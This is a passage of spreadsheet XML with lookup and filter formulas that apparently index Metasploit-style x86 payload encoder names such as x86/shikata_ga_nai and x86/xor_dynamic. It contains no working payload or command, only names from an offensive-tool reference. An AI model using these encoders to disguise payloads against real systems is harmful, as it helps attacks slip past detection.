        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K89),$K$53:$K$97,0)),"")</f>
        <v>x86/nonalpha</v>
      </c>
      <c r="M89" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q89" s="130" t="s">
        <v>22058</v>
      </c>
      <c r="R89" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S89" s="131" t="str">
        <f>IF(R89=1,COUNTIF($R$53:R89,1),"")</f>
        <v/>
      </c>
      <c r="T89" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S89),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
    </row>
    <row r="90" spans="1:20" x14ac:dyDescent="0.25">
      <c r="A90" s="130" t="s">
        <v>22059</v>
      </c>
      <c r="B90" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C90" s="131" t="str">
        <f>IF(B90=1,COUNTIF($B$53:B90,1),"")</f>
        <v/>
      </c>
      <c r="D90" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C90),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E90" s="129" t="s">
        <v>269</v>
      </c>
      <c r="I90" s="130" t="s">
        <v>22060</v>
      </c>
      <c r="J90" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K90" s="131">
        <f>IF(J90=1,COUNTIF($J$53:J90,1),"")</f>
        <v>38</v>
      </c>
      <c r="L90" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K90),$K$53:$K$97,0)),"")</f>
        <v>x86/nonupper</v>
      </c>
      <c r="M90" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q90" s="130" t="s">
        <v>22061</v>
      </c>
      <c r="R90" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S90" s="131" t="str">
        <f>IF(R90=1,COUNTIF($R$53:R90,1),"")</f>
        <v/>
      </c>
      <c r="T90" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S90),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
    </row>
    <row r="91" spans="1:20" x14ac:dyDescent="0.25">
      <c r="A91" s="130" t="s">
        <v>22062</v>
      </c>
      <c r="B91" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C91" s="131" t="str">
        <f>IF(B91=1,COUNTIF($B$53:B91,1),"")</f>
        <v/>
      </c>
      <c r="D91" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C91),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E91" s="129" t="s">
        <v>269</v>
      </c>
      <c r="I91" s="130" t="s">
        <v>22063</v>
      </c>
      <c r="J91" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K91" s="131">
        <f>IF(J91=1,COUNTIF($J$53:J91,1),"")</f>
        <v>39</v>
      </c>
      <c r="L91" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K91),$K$53:$K$97,0)),"")</f>
        <v>x86/opt_sub</v>
      </c>
      <c r="M91" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q91" s="130" t="s">
        <v>22064</v>
      </c>
      <c r="R91" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S91" s="131" t="str">
        <f>IF(R91=1,COUNTIF($R$53:R91,1),"")</f>
        <v/>
      </c>
      <c r="T91" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S91),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
    </row>
    <row r="92" spans="1:20" x14ac:dyDescent="0.25">
      <c r="A92" s="130" t="s">
        <v>22065</v>
      </c>
      <c r="B92" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C92" s="131" t="str">
        <f>IF(B92=1,COUNTIF($B$53:B92,1),"")</f>
        <v/>
      </c>
      <c r="D92" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C92),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E92" s="129" t="s">
        <v>269</v>
      </c>
      <c r="I92" s="130" t="s">
        <v>22066</v>
      </c>
      <c r="J92" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K92" s="131">
        <f>IF(J92=1,COUNTIF($J$53:J92,1),"")</f>
        <v>40</v>
      </c>
      <c r="L92" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K92),$K$53:$K$97,0)),"")</f>
        <v>x86/service</v>
      </c>
      <c r="M92" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q92" s="130" t="s">
        <v>22067</v>
      </c>
      <c r="R92" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S92" s="131" t="str">
        <f>IF(R92=1,COUNTIF($R$53:R92,1),"")</f>
        <v/>
      </c>
      <c r="T92" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S92),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
    </row>
    <row r="93" spans="1:20" x14ac:dyDescent="0.25">
      <c r="A93" s="130" t="s">
        <v>22068</v>
      </c>
      <c r="B93" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C93" s="131" t="str">
        <f>IF(B93=1,COUNTIF($B$53:B93,1),"")</f>
        <v/>
      </c>
      <c r="D93" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C93),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E93" s="129" t="s">
        <v>269</v>
      </c>
      <c r="I93" s="130" t="s">
        <v>22069</v>
      </c>
      <c r="J93" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K93" s="131">
        <f>IF(J93=1,COUNTIF($J$53:J93,1),"")</f>
        <v>41</v>
      </c>
      <c r="L93" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K93),$K$53:$K$97,0)),"")</f>
        <v>x86/shikata_ga_nai</v>
      </c>
      <c r="M93" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q93" s="130" t="s">
        <v>22013</v>
      </c>
      <c r="R93" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S93" s="131" t="str">
        <f>IF(R93=1,COUNTIF($R$53:R93,1),"")</f>
        <v/>
      </c>
      <c r="T93" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S93),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
    </row>
    <row r="94" spans="1:20" x14ac:dyDescent="0.25">
      <c r="A94" s="130" t="s">
        <v>22070</v>
      </c>
      <c r="B94" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C94" s="131" t="str">
        <f>IF(B94=1,COUNTIF($B$53:B94,1),"")</f>
        <v/>
      </c>
      <c r="D94" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C94),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E94" s="129" t="s">
        <v>269</v>
      </c>
      <c r="I94" s="130" t="s">
        <v>22071</v>
      </c>
      <c r="J94" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K94" s="131">
        <f>IF(J94=1,COUNTIF($J$53:J94,1),"")</f>
        <v>42</v>
      </c>
      <c r="L94" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K94),$K$53:$K$97,0)),"")</f>
        <v>x86/single_static_bit</v>
      </c>
      <c r="M94" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q94" s="130" t="s">
        <v>22072</v>
      </c>
      <c r="R94" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S94" s="131" t="str">
        <f>IF(R94=1,COUNTIF($R$53:R94,1),"")</f>
        <v/>
      </c>
      <c r="T94" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S94),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
    </row>
    <row r="95" spans="1:20" x14ac:dyDescent="0.25">
      <c r="A95" s="130" t="s">
        <v>22073</v>
      </c>
      <c r="B95" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C95" s="131" t="str">
        <f>IF(B95=1,COUNTIF($B$53:B95,1),"")</f>
        <v/>
      </c>
      <c r="D95" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C95),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E95" s="129" t="s">
        <v>269</v>
      </c>
      <c r="I95" s="130" t="s">
        <v>22074</v>
      </c>
      <c r="J95" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K95" s="131">
        <f>IF(J95=1,COUNTIF($J$53:J95,1),"")</f>
        <v>43</v>
      </c>
      <c r="L95" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K95),$K$53:$K$97,0)),"")</f>
        <v>x86/unicode_mixed</v>
      </c>
      <c r="M95" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q95" s="130" t="s">
        <v>22075</v>
      </c>
      <c r="R95" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S95" s="131" t="str">
        <f>IF(R95=1,COUNTIF($R$53:R95,1),"")</f>
        <v/>
      </c>
      <c r="T95" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S95),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
    </row>
    <row r="96" spans="1:20" x14ac:dyDescent="0.25">
      <c r="A96" s="130" t="s">
        <v>22076</v>
      </c>
      <c r="B96" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C96" s="131" t="str">
        <f>IF(B96=1,COUNTIF($B$53:B96,1),"")</f>
        <v/>
      </c>
      <c r="D96" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C96),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E96" s="129" t="s">
        <v>269</v>
      </c>
      <c r="I96" s="130" t="s">
        <v>22077</v>
      </c>
      <c r="J96" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K96" s="131">
        <f>IF(J96=1,COUNTIF($J$53:J96,1),"")</f>
        <v>44</v>
      </c>
      <c r="L96" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K96),$K$53:$K$97,0)),"")</f>
        <v>x86/unicode_upper</v>
      </c>
      <c r="M96" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q96" s="130" t="s">
        <v>22021</v>
      </c>
      <c r="R96" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S96" s="131" t="str">
        <f>IF(R96=1,COUNTIF($R$53:R96,1),"")</f>
        <v/>
      </c>
      <c r="T96" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S96),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
    </row>
    <row r="97" spans="1:20" ht="15.75" thickBot="1" x14ac:dyDescent="0.3">
      <c r="A97" s="130" t="s">
        <v>22078</v>
      </c>
      <c r="B97" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C97" s="131" t="str">
        <f>IF(B97=1,COUNTIF($B$53:B97,1),"")</f>
        <v/>
      </c>
      <c r="D97" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C97),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E97" s="129" t="s">
        <v>269</v>
      </c>
      <c r="I97" s="133" t="s">
        <v>22079</v>
      </c>
      <c r="J97" s="134">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K97" s="134">
        <f>IF(J97=1,COUNTIF($J$53:J97,1),"")</f>
        <v>45</v>
      </c>
      <c r="L97" s="135" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K97),$K$53:$K$97,0)),"")</f>
        <v>x86/xor_dynamic</v>
      </c>
      <c r="M97" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q97" s="130" t="s">
        <v>22080</v>
      </c>
      <c r="R97" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S97" s="131" t="str">
        <f>IF(R97=1,COUNTIF($R$53:R97,1),"")</f>
        <v/>
      </c>
      <c r="T97" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S97),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
    </row>
    <row r="98" spans="1:20" x14ac:dyDescent="0.25">
      <c r="A98" s="130" t="s">
        <v>22081</v>
      </c>
      <c r="B98" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C98" s="131" t="str">
        <f>IF(B98=1,COUNTIF($B$53:B98,1),"")</f>
        <v/>
      </c>
      <c r="D98" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C98),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E98" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q98" s="130" t="s">
        <v>22082</v>
      </c>
      <c r="R98" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S98" s="131" t="str">
        <f>IF(R98=1,COUNTIF($R$53:R98,1),"")</f>
        <v/>
      </c>
      <c r="T98" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S98),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
    </row>
    <row r="99" spans="1:20" x14ac:dyDescent="0.25">
      <c r="A99" s="130" t="s">
        <v>22083</v>
      </c>
      <c r="B99" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C99" s="131" t="str">
        <f>IF(B99=1,COUNTIF($B$53:B99,1),"")</f>
        <v/>
      </c>
      <c r="D99" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C99),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E99" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q99" s="130" t="s">
        <v>22084</v>
      </c>
      <c r="R99" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S99" s="131" t="str">
        <f>IF(R99=1,COUNTIF($R$53:R99,1),"")</f>
        <v/>
      </c>
      <c r="T99" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S99),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
    </row>
    <row r="100" spans="1:20" x14ac:dyDescent="0.25">
      <c r="A100" s="130" t="s">
        <v>22085</v>
      </c>
      <c r="B100" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C100" s="131" t="str">
        <f>IF(B100=1,COUNTIF($B$53:B100,1),"")</f>
        <v/>
      </c>
      <c r="D100" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C100),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E100" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q100" s="130" t="s">
        <v>22086</v>
      </c>
      <c r="R100" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S100" s="131" t="str">
        <f>IF(R100=1,COUNTIF($R$53:R100,1),"")</f>
        <v/>
      </c>
      <c r="T100" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S100),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
    </row>
    <row r="101" spans="1:20" x14ac:dyDescent="0.25">
      <c r="A101" s="130" t="s">
        <v>22087</v>
      </c>
      <c r="B101" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C101" s="131" t="str">
        <f>IF(B101=1,COUNTIF($B$53:B101,1),"")</f>
        <v/>
      </c>
      <c r="D101" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C101),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E101" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q101" s="130" t="s">
        <v>22088</v>
      </c>
      <c r="R101" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S101" s="131" t="str">
        <f>IF(R101=1,COUNTIF($R$53:R101,1),"")</f>
        <v/>
      </c>
      <c r="T101" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S101),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
    </row>
    <row r="102" spans="1:20" x14ac:dyDescent="0.25">
      <c r="A102" s="130" t="s">
        <v>22089</v>
      </c>
      <c r="B102" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C102" s="131" t="str">
        <f>IF(B102=1,COUNTIF($B$53:B102,1),"")</f>
        <v/>
      </c>
      <c r="D102" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C102),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E102" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q102" s="130" t="s">
        <v>22090</v>
      </c>
      <c r="R102" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S102" s="131" t="str">
        <f>IF(R102=1,COUNTIF($R$53:R102,1),"")</f>
        <v/>
      </c>
      <c r="T102" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S102),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
    </row>
    <row r="103" spans="1:20" x14ac:dyDescent="0.25">
      <c r="A103" s="130" t="s">
        <v>22091</v>
      </c>
      <c r="B103" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C103" s="131" t="str">
        <f>IF(B103=1,COUNTIF($B$53:B103,1),"")</f>
        <v/>
      </c>
      <c r="D103" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C103),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E103" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q103" s="130" t="s">
        <v>22092</v>
      </c>
      <c r="R103" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S103" s="131" t="str">
        <f>IF(R103=1,COUNTIF($R$53:R103,1),"")</f>
        <v/>
      </c>
      <c r="T103" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S103),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
    </row>
    <row r="104" spans="1:20" ht="15.75" thickBot="1" x14ac:dyDescent="0.3">
      <c r="A104" s="130" t="s">
        <v>22093</v>
      </c>
      <c r="B104" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C104" s="131" t="str">
        <f>IF(B104=1,COUNTIF($B$53:B104,1),"")</f>
        <v/>
      </c>
      <c r="D104" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C104),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E104" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q104" s="133" t="s">
        <v>22094</v>
      </c>
      <c r="R104" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S104" s="131" t="str">
        <f>IF(R104=1,COUNTIF($R$53:R104,1),"")</f>
        <v/>
      </c>
      <c r="T104" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S104),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
    </row>
    <row r="105" spans="1:20" x14ac:dyDescent="0.25">
      <c r="A105" s="130" t="s">
        <v>22095</v>
      </c>
      <c r="B105" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C105" s="131" t="str">
        <f>IF(B105=1,COUNTIF($B$53:B105,1),"")</f>
        <v/>
      </c>
      <c r="D105" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C105),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E105" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="106" spans="1:20" x14ac:dyDescent="0.25">
      <c r="A106" s="130" t="s">
        <v>22096</v>
      </c>
      <c r="B106" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C106" s="131" t="str">
        <f>IF(B106=1,COUNTIF($B$53:B106,1),"")</f>
        <v/>
      </c>
      <c r="D106" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C106),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E106" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="107" spans="1:20" x14ac:dyDescent="0.25">
      <c r="A107" s="130" t="s">
        <v>22097</v>
      </c>
      <c r="B107" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C107" s="131" t="str">
        <f>IF(B107=1,COUNTIF($B$53:B107,1),"")</f>
        <v/>
      </c>
      <c r="D107" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C107),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E107" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="108" spans="1:20" x14ac:dyDescent="0.25">
      <c r="A108" s="130" t="s">
        <v>22098</v>
      </c>
      <c r="B108" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C108" s="131" t="str">
        <f>IF(B108=1,COUNTIF($B$53:B108,1),"")</f>
        <v/>
      </c>
      <c r="D108" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C108),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E108" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="109" spans="1:20" x14ac:dyDescent="0.25">
      <c r="A109" s="130" t="s">
        <v>22099</v>
      </c>
      <c r="B109" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C109" s="131" t="str">
        <f>IF(B109=1,COUNTIF($B$53:B109,1),"")</f>
        <v/>
      </c>
      <c r="D109" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C109),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E109" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="110" spans="1:20" x14ac:dyDescent="0.25">
      <c r="A110" s="130" t="s">
        <v>22100</v>
      </c>
      <c r="B110" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C110" s="131" t="str">
        <f>IF(B110=1,COUNTIF($B$53:B110,1),"")</f>
        <v/>
      </c>
      <c r="D110" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C110),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E110" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="111" spans="1:20" x14ac:dyDescent="0.25">
      <c r="A111" s="130" t="s">
        <v>22101</v>
      </c>
      <c r="B111" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C111" s="131" t="str">
        <f>IF(B111=1,COUNTIF($B$53:B111,1),"")</f>
        <v/>
      </c>
      <c r="D111" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C111),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E111" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="112" spans="1:20" x14ac:dyDescent="0.25">
      <c r="A112" s="130" t="s">
        <v>22102</v>
      </c>
      <c r="B112" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C112" s="131" t="str">
        <f>IF(B112=1,COUNTIF($B$53:B112,1),"")</f>
        <v/>
      </c>
      <c r="D112" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C112),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E112" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="113" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A113" s="130" t="s">
        <v>22103</v>
      </c>
      <c r="B113" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C113" s="131" t="str">
        <f>IF(B113=1,COUNTIF($B$53:B113,1),"")</f>
        <v/>
      </c>
      <c r="D113" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C113),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E113" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="114" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A114" s="130" t="s">
        <v>22104</v>
      </c>
      <c r="B114" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C114" s="131" t="str">
        <f>IF(B114=1,COUNTIF($B$53:B114,1),"")</f>
        <v/>
      </c>
      <c r="D114" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C114),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E114" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="115" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A115" s="130" t="s">
        <v>22105</v>
      </c>
      <c r="B115" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C115" s="131" t="str">
        <f>IF(B115=1,COUNTIF($B$53:B115,1),"")</f>
        <v/>
      </c>
      <c r="D115" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C115),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E115" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="116" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A116" s="130" t="s">
        <v>22106</v>
      </c>
      <c r="B116" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C116" s="131" t="str">
        <f>IF(B116=1,COUNTIF($B$53:B116,1),"")</f>
        <v/>
      </c>
      <c r="D116" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C116),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E116" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="117" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A117" s="130" t="s">
        <v>22107</v>
      </c>
      <c r="B117" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C117" s="131" t="str">
        <f>IF(B117=1,COUNTIF($B$53:B117,1),"")</f>
        <v/>
      </c>
      <c r="D117" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C117),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E117" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="118" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A118" s="130" t="s">
        <v>22108</v>
      </c>
      <c r="B118" s="131">
        <f t="shared" ref="B118:B181" si="4">--ISNUMBER(IFERROR(SEARCH($A$52,A118,1),""))</f>
        <v>0</v>
      </c>
      <c r="C118" s="131" t="str">
        <f>IF(B118=1,COUNTIF($B$53:B118,1),"")</f>
        <v/>
      </c>
      <c r="D118" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C118),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E118" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="119" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A119" s="130" t="s">
        <v>22109</v>
      </c>
      <c r="B119" s="131">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="C119" s="131" t="str">
        <f>IF(B119=1,COUNTIF($B$53:B119,1),"")</f>
        <v/>
      </c>
      <c r="D119" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C119),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E119" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="120" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A120" s="130" t="s">
        <v>22110</v>
      </c>
      <c r="B120" s="131">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="C120" s="131" t="str">
        <f>IF(B120=1,COUNTIF($B$53:B120,1),"")</f>
        <v/>
      </c>
      <c r="D120" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C120),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E120" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="121" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A121" s="130" t="s">
        <v>22111</v>
      </c>
